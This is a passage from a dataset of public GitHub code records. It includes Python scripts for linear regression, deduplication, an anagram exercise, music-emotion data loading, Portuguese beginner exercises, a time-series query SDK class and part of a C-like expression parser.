(training data input)\n y: array, one-variable output data (training data output)\n \"\"\"\n num_examples = x.shape[0]\n\n ones = np.ones((num_examples,))\n X = np.vstack((x, ones)).T\n theta = np.zeros((2,1))\n y = y.reshape(num_examples, 1) \n \n num_iterations = 1500\n learning_rate = 0.01\n\n cost_array = np.array([])\n for i in range(num_iterations):\n theta = updateTheta(X, y, theta, learning_rate, num_examples)\n cost = computeCost(X, y, theta, num_examples)\n cost_array = np.append(cost_array, cost)\n print(\"Cost: %s\" % cost)\n return cost_array, theta \n\nif __name__ == \"__main__\":\n x, y = extractData()\n plotScatterData(x, y)\n cost_array, theta = gradientDescent(x, y)\n X = plotLineFit(x, y, theta)\n plotLineData(range(len(cost_array)), cost_array)\n","repo_name":"dowusu-antwi/ml-tools","sub_path":"linear-regression/linear-regression.py","file_name":"linear-regression.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34263100578","text":"#当对象是不可哈希的序列时,想要在其中去除重复项\n#这里的key的作用是指定一个函数用来将序列中的元素转换为可哈希的类型,这么做的目的是为了检测重复项\ndef dedupe(items, key=None):\n\tseen = set()\n\tfor item in items:\n\t\tval = item if key is None else key(item)\n\t\tif val not in seen:\n\t\t\tyield item\n\t\t\tseen.add(val)\n\na = [{'x':1, 'y':2}, {'x':1, 'y':3}, {'x':1, 'y':2},{'x':2, 'y':4}]\nprint(list(dedupe(a, key=lambda d: (d['x'],d['y']))))","repo_name":"skyofstars-ice/PythonCookbook","sub_path":"第1章 数据结构与算法/1.10 从序列中移除重复项且保持元素间顺序不变/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25985814563","text":"# challenge from hackerrank https://www.hackerrank.com/challenges/ctci-making-anagrams\n\ns1 = input('Enter first word: ')\ns2 = input('Enter second word: ')\n\ns1_encoded = {}\ns2_encoded = {}\n\ncharacters_deleted = 0\n\nfor i in s1:\n if i in s1_encoded:\n s1_encoded[i] += 1\n else:\n s1_encoded[i] = 1\n\nfor i in s2:\n if i in s2_encoded:\n s2_encoded[i] += 1\n else:\n s2_encoded[i] = 1\n\nfor i in s1_encoded:\n if i not in s2_encoded:\n characters_deleted += s1_encoded[i]\n\nfor i in s2_encoded:\n if i not in s1_encoded:\n characters_deleted += s2_encoded[i]\n else:\n characters_deleted += abs(s1_encoded[i] - s2_encoded[i])\n\nprint(characters_deleted)\n","repo_name":"KyriakosMilad/algorithms","sub_path":"hackerrank/makeAnagram/makeAnagram.py","file_name":"makeAnagram.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"71446478131","text":"import numpy as np\nfrom pandas import DataFrame\nimport os\n\nfrom utility.mkdir_p import mkdir_p\n# Default paths to the mirexdatabase files\nfilename_metadata = \"../mirexdatabase/annotations/songs_info.csv\"\nfile_arousal = \"../mirexdatabase/annotations/arousal_cont_average.csv\"\nfile_arousal_std = \"../mirexdatabase/annotations/arousal_cont_std.csv\"\nfile_valence = \"../mirexdatabase/annotations/valence_cont_average.csv\"\nfile_valence_std = \"../mirexdatabase/annotations/valence_cont_std.csv\"\n\npath_to_default_features = \"../mirexdatabase/default_features/\"\n\n\ndef load_csv_directory(csv_directory=path_to_default_features):\n \"\"\"\n :return: Numpy matrix containing the features Shape: [num_files, num_rows, num_columns]\n \"\"\"\n feature_sets = []\n # sorted list of files in csv directory\n list_csv = os.listdir(csv_directory)\n list_csv.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))\n\n for i in list_csv:\n # print('Load_csv_directory: Loading file', csv_directory+i)\n feature_sets.append(np.genfromtxt(csv_directory + i, delimiter=';', skip_header=1))\n\n feature_sets = np.stack(feature_sets)\n print('Stacked features shape: ', feature_sets.shape)\n\n return feature_sets\n\n\ndef generate_metadata(infofile=filename_metadata):\n \"\"\"\n Fetches es the meta data from the mirex database\n :return: Panda Dataframe containing all the data where text entries have been changed to numeric values\n \"\"\"\n meta_data = DataFrame.from_csv(infofile)\n meta_data.reset_index(level=0, inplace=True)\n\n mapping = {'Genre': {'\\tBlues\\t': 0, '\\tClassical\\t': 1, '\\tCountry\\t': 2,\n '\\tElectronic\\t': 3, '\\tFolk\\t': 4, '\\tJazz\\t': 5, '\\tPop\\t': 6, '\\tRock\\t': 7},\n 'Mediaeval 2013 set': {'development': 0, 'evaluation': 1}\n }\n meta_data = meta_data.replace(mapping)\n\n return meta_data\n\n\ndef get_validation_data(dataframe):\n \"\"\" Gets the mirex validation set feature files \"\"\"\n df = dataframe\n eval_set = df.loc[df['Mediaeval 2013 set'] == 1]\n return eval_set\n\n\ndef get_labels_valence(file=file_valence):\n \"\"\" Gets the valence labels from the mirex database. \"\"\"\n valence_labels = np.genfromtxt(file, delimiter=',', skip_header=1)\n return valence_labels[:, 1:]\n\n\ndef get_labels_arousal(file=file_arousal):\n \"\"\" Gets the arousal labels from the mirex database. \"\"\"\n arousal_labels = np.genfromtxt(file, delimiter=',', skip_header=1)\n return arousal_labels[:, 1:]\n\n\ndef get_std_arousal(file=file_arousal_std):\n \"\"\" Gets the arousal standard deviation from the mirex database. \"\"\"\n arousal_std = np.genfromtxt(file, delimiter=',', skip_header=1)\n return arousal_std[:, 1:]\n\n\ndef get_std_valence(file=file_valence_std):\n \"\"\" Gets the valence standard deviation from the mirex database. \"\"\"\n valence_std = np.genfromtxt(file, delimiter=',', skip_header=1)\n return valence_std[:, 1:]\n\n\ndef combine_features_labels_to_csv(path=path_to_default_features, arousal=file_arousal, valence=file_valence,\n arousal_std=file_arousal_std, valence_std=file_valence_std):\n \"\"\" Combines the features and labels into one file. \"\"\"\n save_path = '../data/ComParE_2016_fsize200_fstep100/'\n mkdir_p(save_path)\n\n list_csv = os.listdir(path)\n list_csv.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))\n arousal = get_labels_arousal(arousal)\n arousal_std = get_std_arousal(arousal_std)\n valence = get_labels_valence(valence)\n valence_std = get_std_valence(valence_std)\n\n corrupted_list = []\n\n i = 0\n for file in list_csv:\n feature_set = np.genfromtxt(path + file, delimiter=';', skip_header=1)\n # 148 at 14,8 seconds\n combined = combine_file(feature_set[148::5, 2:],\n arousal[i, :-1].reshape(-1, 1),\n valence[i, :-1].reshape(-1, 1),\n arousal_std[i, :-1].reshape(-1, 1),\n valence_std[i, :-1].reshape(-1, 1))\n\n if combined is not None:\n print(\"Saving file: \", file, 'Number: ', i)\n np.savetxt(save_path + file, combined, delimiter=',')\n else:\n print('Dimensionality Error probably due to corrupted wave in file:', file)\n corrupted_list.append(file)\n\n i = i+1\n\n print('Corrupted: ', corrupted_list)\n\n\ndef combine_features_repeated_labels_to_csv(arousal=file_arousal, valence=file_valence,\n arousal_std=file_arousal_std, valence_std=file_valence_std):\n \"\"\"\n Combines the features and labels into one file, while repeating the labels n times with n\n being the number of samples per label.\n \"\"\"\n\n save_path = '../data/ComParE_2016_fsize200_fstep100_repeat/'\n path = '../features/ComParE_2016_fsize200_fstep100/'\n mkdir_p(save_path)\n\n list_csv = os.listdir(path)\n list_csv.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))\n arousal = get_labels_arousal(arousal)\n arousal_std = get_std_arousal(arousal_std)\n valence = get_labels_valence(valence)\n valence_std = get_std_valence(valence_std)\n\n corrupted_list = []\n\n i = 0\n for file in list_csv:\n feature_set = np.genfromtxt(path + file, delimiter=';', skip_header=1)\n # 148 at 14,8 seconds\n combined = combine_file(feature_set[148:, 2:],\n arousal[i, :-1].repeat(5).reshape(-1, 1),\n valence[i, :-1].repeat(5).reshape(-1, 1),\n arousal_std[i, :-1].repeat(5).reshape(-1, 1),\n valence_std[i, :-1].repeat(5).reshape(-1, 1))\n\n if combined is not None:\n print(\"Saving file: \", file, 'Number: ', i)\n np.savetxt(save_path + file, combined, delimiter=',')\n else:\n print('Dimensionality Error probably due to corrupted wave in file:', file)\n corrupted_list.append(file)\n\n i = i + 1\n print('Corrupted: ', corrupted_list)\n\n\ndef combine_file(feature_set, arousal, valence, arousal_std, valence_std):\n print('feature set shape: ', feature_set.shape)\n print('Labels shape:', arousal.shape)\n\n try:\n combined = np.concatenate((feature_set,\n arousal,\n valence,\n arousal_std,\n valence_std), axis=1)\n print(\"combined shape: \", combined.shape)\n return combined\n except ValueError:\n return None\n","repo_name":"clangenb/rt-amaf-viewer","sub_path":"data/mirex_data_handlers.py","file_name":"mirex_data_handlers.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"1590974074","text":"\"\"\"\nExercício triplo sobre condições\n\nFaça um programa que peça ao usuário para digitar um número inteiro,\ninforme se este número é par ou ímpar. Caso o usuário não digite um número\ninteiro, informe que não é um número inteiro.\n\"\"\"\nwhile True:\n entrada = input('Digite um número inteiro: ')\n if entrada.isdigit():\n entrada_int = int(entrada)\n par_impar = entrada_int % 2 == 0\n par_impar_texto = 'ímpar'\n\n if par_impar:\n par_impar_texto = 'par'\n\n print(f'O número {entrada_int} é {par_impar_texto}')\n break\n else:\n print('Você não digitou um número inteiro!')\n\n\"\"\"\nFaça um programa que pergunte a hora ao usuário e, baseando-se no horário \ndescrito, exiba a saudação apropriada. Ex. \nBom dia 0-11, Boa tarde 12-17 e Boa noite 18-23.\n\"\"\"\nwhile True:\n question_hours = input('Que horas são? ')\n if len(question_hours) == 5 and \\\n question_hours[2] == ':' and \\\n question_hours[:2].isnumeric() and \\\n question_hours[3:].isnumeric():\n hours = int(question_hours[:2])\n minutes = int(question_hours[3:])\n if hours >= 0 and hours <= 23 \\\n and minutes >= 0 and minutes <= 59:\n if question_hours >= '00:00' and question_hours <= '11:59':\n print('Bom dia!')\n elif question_hours >= '12:00' and question_hours <= '17:59':\n print('Boa tarde!')\n else:\n print('Boa noite!')\n break\n else:\n print('Horário inválido. Digite um horário entre 00:00 e 23:59.')\n else:\n print('Formato de hora inválido. Use o seguinte formato: XX:XX')\n\n\"\"\"\nFaça um programa que peça o primeiro nome do usuário. Se o nome tiver 4 letras ou \nmenos escreva \"Seu nome é curto\"; se tiver entre 5 e 6 letras, escreva \n\"Seu nome é normal\"; maior que 6 escreva \"Seu nome é grande\". \n\"\"\"\nwhile True:\n nome = input('Digite seu primeiro nome: ')\n tamanho = len(nome)\n\n if tamanho <= 4:\n print('Seu nome é curto.')\n elif 5 <= tamanho <= 6:\n print('Seu nome é normal.')\n elif 7 <= tamanho <= 11:\n print('Seu nome é grande.')\n else:\n print('Nome inválido para consulta.')\n if not nome:\n print('Você não digitou nenhum nome.')\n continue\n break","repo_name":"gustavof04/curso-python-3","sub_path":"exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28330405286","text":"from __future__ import annotations\nfrom typing import List, Optional\nfrom urllib import parse\nfrom Artesian.Exceptions import ArtesianSdkException\nfrom Artesian._ClientsExecutor.RequestExecutor import _RequestExecutor\nfrom Artesian._ClientsExecutor.Client import _Client\nfrom .DefaultPartitionStrategy import DefaultPartitionStrategy\nfrom ._Query import _Query\nfrom Artesian.Query._QueryParameters.QueryParameters import (\n _FillCustomTimeserieStrategy,\n _FillLatestStrategy,\n _NoFillStrategy,\n _NullFillStrategy,\n)\nfrom ._QueryParameters.VersionedQueryParameters import VersionedQueryParameters\nfrom ._QueryParameters.VersionSelectionType import VersionSelectionType\nfrom .RelativeInterval import RelativeInterval\nfrom Artesian.MarketData import Granularity\n\n\nclass VersionedQuery(_Query):\n __routePrefix = \"vts\"\n\n def __init__(\n self: VersionedQuery,\n client: _Client,\n requestExecutor: _RequestExecutor,\n partitionStrategy: DefaultPartitionStrategy,\n ) -> None:\n \"\"\"Inits _VersionedQuery\"\"\"\n\n queryParameters = VersionedQueryParameters()\n _Query.__init__(self, client, requestExecutor, queryParameters)\n self._queryParameters = queryParameters\n self.__partition = partitionStrategy\n\n def forMarketData(self: VersionedQuery, ids: List[int]) -> VersionedQuery:\n \"\"\"Set the list of marketdata to be queried.\n\n Args:\n ids: list of marketdata id's to be queried. Ex.: 100000xxx\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._forMarketData(ids)\n return self\n\n def forFilterId(self: VersionedQuery, filterId: int) -> VersionedQuery:\n \"\"\"Sets the list of filtered marketdata id to be queried\n\n Args:\n filterId: marketdata filtered by id\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._forFilterId(filterId)\n return self\n\n def inTimeZone(self: VersionedQuery, tz: str) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a specific TimeZone in IANA format.\n\n Args:\n timezone: \"UTC\",\"CET\",\"Europe/Istanbul\"\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inTimezone(tz)\n return self\n\n def inAbsoluteDateRange(\n self: VersionedQuery, start: str, end: str\n ) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in an absolute date range window.\n The Absolute Date Range is in ISO8601 format.\n\n Args:\n start: string for the date start of the range of extracted timeserie,\n in ISO format. (ex.: \"2022-01-01\")\n end: string for the EXCLUSIVE date end of the range of extracted timeserie,\n in ISO format. (ex.: \"2022-01-01\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inAbsoluteDateRange(start, end)\n return self\n\n def inRelativePeriodRange(\n self: VersionedQuery, pStart: str, pEnd: str\n ) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a relative period range time window.\n\n Args:\n pStart: string for the relative period start of the range of extracted\n timeseries. (ex.: \"P--3D\")\n pEnd: string for the relative period end of the range of the extracted\n timeseries. (ex.: \"P10D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inRelativePeriodRange(pStart, pEnd)\n return self\n\n def inRelativePeriod(self: VersionedQuery, extractionPeriod: str) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a relative period of a time window.\n\n Args:\n extractionPeriod: string the relative period of extracted timeseries.\n (ex.: \"P5D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inRelativePeriod(extractionPeriod)\n return self\n\n def inRelativeInterval(\n self: VersionedQuery, relativeInterval: RelativeInterval\n ) -> VersionedQuery:\n \"\"\"Gets the Relative Interval considers a specific interval of time window.\n\n Args:\n relativeInterval: ENUM. the relative interval of extracted timeseries.\n (ex.: \"RelativeInterval.ROLLING_WEEK\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inRelativeInterval(relativeInterval)\n return self\n\n def withTimeTransform(self: VersionedQuery, tr: str) -> VersionedQuery:\n \"\"\"Gets the Versioned query in a specific Time Transform.\n\n Args:\n tr: \"Custom\",\"GASDAY66\",\"THERMALYEAR\"\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.transformId = tr\n return self\n\n def inGranularity(self: VersionedQuery, granularity: Granularity) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a specific Granularity.\n\n Args:\n granularity: Enum ex.: \"TenMinute\", \"FifteenMinute\", \"Hour\", \"Year\"\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.granularity = granularity\n return self\n\n def forMUV(\n self: VersionedQuery, versionLimit: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the timeseries of the most updated version of each timepoint of\n a versioned timeseries.\n\n Args:\n versionLimit: string specifying a datetime from which the most updated\n version should be taken, i.e. MUV as of (versionLimit).\n Ex.: versionLimit(\"2021-03-12T14:30:00\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionLimit = versionLimit\n self._queryParameters.versionSelectionType = VersionSelectionType.MUV\n return self\n\n def forLastOfDays(\n self: VersionedQuery, start: str, end: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the lastest version of a versioned timeseries of each day\n in a time window..\n\n Args:\n start: string for the start timeseries for last of days.\n ex.: forLastOfDays(\"2021-03-12\",...),forLastOfDays(\"P0Y0M-2D\", ...)\n end: string for the end timeseries for last of days.\n ex.: forLastOfDays(\"2021-03-12\",\"2021-03-16\")\n forLastOfDays(\"P0Y0M-2D\",\"P0Y0M2D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n\n self._queryParameters.versionSelectionType = VersionSelectionType.LastOfDays\n vr = self._queryParameters.versionSelectionConfig.versionsRange\n if start.startswith(\"P\"):\n if end is None:\n vr.period = start\n else:\n vr.periodFrom = start\n vr.periodTo = end\n else:\n vr.dateStart = start\n vr.dateEnd = end\n return self\n\n def forLastOfMonths(\n self: VersionedQuery, start: str, end: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the lastest version of a versioned timeseries of each month\n in a time window.\n\n Args:\n start: string for the start timeseries for last of month.\n ex: forLastOfMonths(\"2021-03-12\",...),forLastOfMonths(\"P0Y-1M0D\",...)\n end: string for the end timeseries for last of month.\n ex: forLastOfMonths(\"2021-03-12\",\"2021-03-16\"),\n forLastOfMonths(\"P0Y-1M0D\",\"P0Y1M0D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.LastOfMonths\n vr = self._queryParameters.versionSelectionConfig.versionsRange\n if start.startswith(\"P\"):\n if end is None:\n vr.period = start\n else:\n vr.periodFrom = start\n vr.periodTo = end\n else:\n vr.dateStart = start\n vr.dateEnd = end\n return self\n\n def forLastNVersions(self: VersionedQuery, lastN: int) -> VersionedQuery:\n \"\"\"Gets the lastest N timeseries versions that have at least a not-null value .\n\n Args:\n lastN: an int > 0. Ex.: forLastNVersions(2)\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.LastN\n self._queryParameters.versionSelectionConfig.lastN = lastN\n return self\n\n def forVersion(self: VersionedQuery, version: str) -> VersionedQuery:\n \"\"\"Gets the specified version of a versioned timeseries.\n\n Args:\n version: string of a specific version. Ex.:forVersion(\"2021-03-12T14:30:00\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.Version\n self._queryParameters.versionSelectionConfig.version = version\n return self\n\n def forMostRecent(\n self: VersionedQuery, start: str, end: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the most recent version of a versioned timeseries in a time window.\n\n Args:\n start: string for the start of the most recent version.\n Ex.: (forMostRecent(\"2021-03-12\",...))\n\n end: string for the end of the most recent version.\n Ex.: (forMostRecent(\"2021-03-12\",\"2021-03-16\"))\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.MostRecent\n vr = self._queryParameters.versionSelectionConfig.versionsRange\n if start.startswith(\"P\"):\n if end is None:\n vr.period = start\n else:\n vr.periodFrom = start\n vr.periodTo = end\n else:\n vr.dateStart = start\n vr.dateEnd = end\n return self\n\n def withFillNull(self: VersionedQuery) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n ex. withFillNull()\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _NullFillStrategy()\n return self\n\n def withFillNone(self: VersionedQuery) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n ex. withFillNone()\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _NoFillStrategy()\n return self\n\n def withFillLatestValue(\n self: VersionedQuery, period: str, continueToEnd: bool = False\n ) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n Args:\n period: string of the last period value to fill in case there are missing\n values. Ex.: withFillLatestValue(\"P5D\")\n continueToEnd: true means the fill extends to the end of the period even\n if there's no value at the end of the period\n false means the fill is only extended to the next valid value\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _FillLatestStrategy(period, continueToEnd)\n return self\n\n def withFillCustomValue(self: VersionedQuery, val: float) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n Args:\n val: float value to fill in case there are missing values.\n Ex.: .withFillCustomValue(10)\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _FillCustomTimeserieStrategy(val)\n return self\n\n def execute(self: VersionedQuery) -> list:\n \"\"\"\n Execute the Query.\n\n Returns:\n list of VersionedQuery.\"\"\"\n urls = self.__buildRequest()\n return super()._exec(urls)\n\n async def executeAsync(self: VersionedQuery) -> list:\n \"\"\"\n Execute Async Query.\n\n Returns:\n list of VersionedQuery\"\"\"\n urls = self.__buildRequest()\n return await super()._execAsync(urls)\n\n def __buildRequest(self: VersionedQuery) -> List[str]:\n self.__validateQuery()\n qps = self.__partition.PartitionVersioned([self._queryParameters])\n urls = []\n for qp in qps:\n url = \"/{0}/{1}/{2}/{3}?_=1\".format(\n self.__routePrefix,\n self.__buildVersionRoute(),\n self.__getGranularityPath(qp.granularity),\n super()._buildExtractionRangeRoute(qp),\n )\n if not (qp.ids is None):\n sep = \",\"\n ids = sep.join(map(str, qp.ids))\n enc = parse.quote_plus(ids)\n url = url + \"&id=\" + enc\n if not (qp.filterId is None):\n url = url + \"&filterId=\" + \"qp.filterId\"\n if not (qp.timezone is None):\n url = url + \"&tz=\" + qp.timezone\n if not (qp.transformId is None):\n url = url + \"&tr=\" + qp.transformId\n if not (qp.fill is None):\n url = url + \"&\" + qp.fill.getUrlParams()\n if not (qp.versionLimit is None):\n url = url + \"&versionLimit=\" + qp.versionLimit\n urls.append(url)\n return urls\n\n def __validateQuery(self: VersionedQuery) -> None:\n super()._validateQuery()\n if self._queryParameters.granularity is None:\n raise Exception(\n \"Extraction granularity must be provided. Use .InGranularity() \"\n + \"argument takes a granularity type\"\n )\n if self._queryParameters.versionSelectionType is None:\n raise Exception(\n \"Version selection must be provided. Provide a version to query. \"\n + \"eg .ForLastOfDays() arguments take a date range, period or range\"\n )\n\n def __buildVersionRoute(self: VersionedQuery) -> str:\n lastN = f\"Last{self._queryParameters.versionSelectionConfig.lastN}\"\n version = f\"Version/{self._queryParameters.versionSelectionConfig.version}\"\n switcher = {\n VersionSelectionType.LastN: lastN,\n VersionSelectionType.MUV: \"Muv\",\n VersionSelectionType.LastOfDays: \"LastOfDays/\" + self.__buildVersionRange(),\n VersionSelectionType.LastOfMonths: \"LastOfMonths/\"\n + self.__buildVersionRange(),\n VersionSelectionType.MostRecent: \"MostRecent/\" + self.__buildVersionRange(),\n VersionSelectionType.Version: version,\n }\n assert self._queryParameters.versionSelectionType is not None\n vr = switcher.get(self._queryParameters.versionSelectionType, \"VType\")\n if vr == \"VType\":\n raise Exception(\"Not supported VersionType\")\n return vr\n\n def __buildVersionRange(self: VersionedQuery) -> str:\n vr = \"\"\n if (\n self._queryParameters.versionSelectionConfig.versionsRange.dateStart\n is not None\n ) and (\n self._queryParameters.versionSelectionConfig.versionsRange.dateEnd\n is not None\n ):\n vr = \"{0}/{1}\".format(\n self._queryParameters.versionSelectionConfig.versionsRange.dateStart,\n self._queryParameters.versionSelectionConfig.versionsRange.dateEnd,\n )\n elif (\n self._queryParameters.versionSelectionConfig.versionsRange.period\n is not None\n ):\n vr = f\"{self._queryParameters.versionSelectionConfig.versionsRange.period}\"\n elif (\n self._queryParameters.versionSelectionConfig.versionsRange.periodFrom\n is not None\n ) and (\n self._queryParameters.versionSelectionConfig.versionsRange.periodTo\n is not None\n ):\n vr = \"{0}/{1}\".format(\n self._queryParameters.versionSelectionConfig.versionsRange.periodFrom,\n self._queryParameters.versionSelectionConfig.versionsRange.periodTo,\n )\n return vr\n\n def __getGranularityPath(\n self: VersionedQuery, granularity: Optional[Granularity]\n ) -> str:\n switcher = {\n Granularity.Day: \"Day\",\n Granularity.FifteenMinute: \"FifteenMinute\",\n Granularity.Hour: \"Hour\",\n Granularity.Minute: \"Minute\",\n Granularity.Month: \"Month\",\n Granularity.Quarter: \"Quarter\",\n Granularity.TenMinute: \"TenMinute\",\n Granularity.ThirtyMinute: \"ThirtyMinute\",\n Granularity.Week: \"Week\",\n Granularity.Year: \"Year\",\n }\n if granularity is None:\n raise ArtesianSdkException(\n \"Missing Granularity. Use .forGranularity() to set one.\"\n )\n\n vr = switcher.get(granularity, \"VGran\")\n return vr\n\n\nclass _NullFillStategy:\n def getUrlParams(self: _NullFillStategy) -> str:\n return \"fillerK=Null\"\n\n\nclass _NoFillStategy:\n def getUrlParams(self: _NoFillStategy) -> str:\n return \"fillerK=NoFill\"\n\n\nclass _FillLatestStategy:\n def __init__(self: _FillLatestStategy, period: str) -> None:\n self.period = period\n\n def getUrlParams(self: _FillLatestStategy) -> str:\n return f\"fillerK=LatestValidValue&fillerP={self.period}\"\n","repo_name":"ARKlab/Artesian.SDK-Python","sub_path":"src/Artesian/Query/VersionedQuery.py","file_name":"VersionedQuery.py","file_ext":"py","file_size_in_byte":17313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"2894257384","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nfrom lexer import *\nfrom expression_handler.calculator import Calculator\n\n_ANNOUNCEMENT = 'announcement'\n_INITIALIZE = 'initialize'\n\n_GETITEM = 'getitem'\n_SETITEM = 'setitem'\n_REFERENCE = 'reference'\n\n\nclass Parser:\n\n def __init__(self, lexer) -> None:\n self._lexer = lexer\n self.memory = types_.Memory()\n\n self.token = None\n self.index = None\n\n def _step(self) -> None:\n self._lexer.next_token()\n self.ch = self._lexer.ch\n self.name = self._lexer.name\n self.value = self._lexer.value\n self.token = self._lexer.token\n\n # arr[] = {, , ..., }\n def _parse_array(self, name: str, pointer: bool = False, *, mode: str):\n \"\"\"\n Defines actions with arrays\n \"\"\"\n def define_action(dimension: int):\n if isinstance(dimension, int):\n if mode == _ANNOUNCEMENT:\n self._step()\n return types_.ARRAY(length=value)\n\n elif mode == _GETITEM:\n variable = self.memory.get_by_name(name, throw=True)\n return variable.value[dimension]\n\n elif mode == _SETITEM:\n self._step()\n self.memory.get_by_name(name, throw=True)\n return dimension\n\n elif mode == _REFERENCE:\n start = self.memory.get_by_name(name, throw=True)\n return start.id + dimension\n else:\n raise SyntaxError('Define_action type must be and not ')\n\n if pointer:\n raise SyntaxError('Not implemented feature')\n\n self._step()\n value = self.calculate_expression(stop_tokens=(RSBR,)) # in [...]\n return define_action(value)\n\n def _set_array_elem(self, controller: types_.Controller) -> None:\n controller.setitem(self.calculate_expression(), self.index)\n\n def _array_init(self, controller: types_.Controller) -> None:\n temp_array = []\n if self.token is LBRC:\n self._step()\n while True:\n temp_array.append(self.calculate_expression(stop_tokens=(COMMA, RBRC)))\n if self.token is RBRC:\n break\n self._step()\n\n if controller.length == 0:\n array = types_.ARRAY(length=len(temp_array))\n variable = controller.variable\n\n variable.value = array\n controller = types_.Controller(variable)\n\n elif controller.length >= len(temp_array):\n zeros = [0 for _ in range(controller.length - len(temp_array))]\n temp_array.extend(zeros)\n else:\n raise SyntaxError('Invalid array length')\n\n list(map(lambda element: controller.append(element), temp_array))\n self._step()\n else:\n raise SyntaxError(f'Unacceptable token {self.token}')\n\n def _pointer_init(self):\n if self.token is REFERENCE:\n self._step()\n if self.token is VARIABLE:\n variable = self.memory.get_by_name(self.name, throw=True)\n self._step()\n\n if self.token is SEMICOLON:\n return variable.__class__, variable.id\n\n elif self.token is LSBR:\n id_ = self._parse_array(variable.name, variable.pointer, mode=_REFERENCE)\n self._step()\n return variable.__class__, id_\n\n elif self.token is VARIABLE:\n variable = self.memory.get_by_name(self.name, throw=True)\n if variable.pointer:\n self._step()\n return variable.__class__, variable.reference\n else:\n raise SyntaxError(f'<{variable.name}> not a pointer variable')\n else:\n raise SyntaxError(f'Unacceptable token {self.token}')\n\n def _scroller(self, token) -> None:\n while self.token != token:\n self._step()\n if self.token is EOF:\n raise SyntaxError(f'Token not found {token}')\n\n def _expression_parser(self, stop_tokens: tuple):\n expression = Calculator()\n ch = None\n star_flag = None\n\n while True:\n if self.token is VARIABLE:\n name = self.name\n variable = self.memory.get_by_name(name, throw=True)\n\n if isinstance(variable.value, types_.ARRAY):\n self._step()\n if self.token is LSBR:\n expression.token_storage.append(str(self._parse_array(name, mode=_GETITEM)))\n else:\n if variable.pointer:\n if star_flag and ch != ' ':\n expression.token_storage.pop()\n id_ = int(variable.reference)\n value = str(self.memory.get_by_id(id_).value[id_])\n expression.token_storage.append(value)\n else:\n raise SyntaxError('Error in pointer construction')\n else:\n if variable.value is not None:\n expression.token_storage.append(str(variable.value))\n else:\n raise SyntaxError(f'Variable <{name}> not defined')\n\n elif self.token is CONSTANT:\n expression.token_storage.append(str(self.value))\n\n elif self.token is LBR:\n expression.token_storage.append('(')\n\n elif self.token is RBR:\n expression.token_storage.append(')')\n\n elif self.token.__base__ is OPERATOR:\n expression.token_storage.append(self.token.operator)\n if self.token is MUL:\n star_flag = True\n ch = self.ch\n\n elif self.token is QUESTION_MARK:\n stop_tokens = (QUESTION_MARK,)\n\n elif self.token.__base__ is LOGIC:\n expression.token_storage.append(self.token.operator)\n\n elif self.token in stop_tokens:\n break\n\n else:\n raise SyntaxError(f'Unacceptable token {self.token}')\n\n self._step()\n\n return expression, stop_tokens\n\n def calculate_expression(self, stop_tokens=(SEMICOLON,)):\n expression, stop_tokens = self._expression_parser(stop_tokens)\n\n if QUESTION_MARK in stop_tokens:\n if expression.find_value():\n expression, *_ = self._expression_parser(stop_tokens=(COLON,))\n self._scroller(token=SEMICOLON)\n else:\n self._scroller(token=COLON)\n expression, *_ = self._expression_parser(stop_tokens=(SEMICOLON,))\n\n if RSBR in stop_tokens and not expression.token_storage:\n return 0 # to initialize an array of undeclared lengths\n\n return expression.find_value()\n\n def _initializer(self, variable) -> 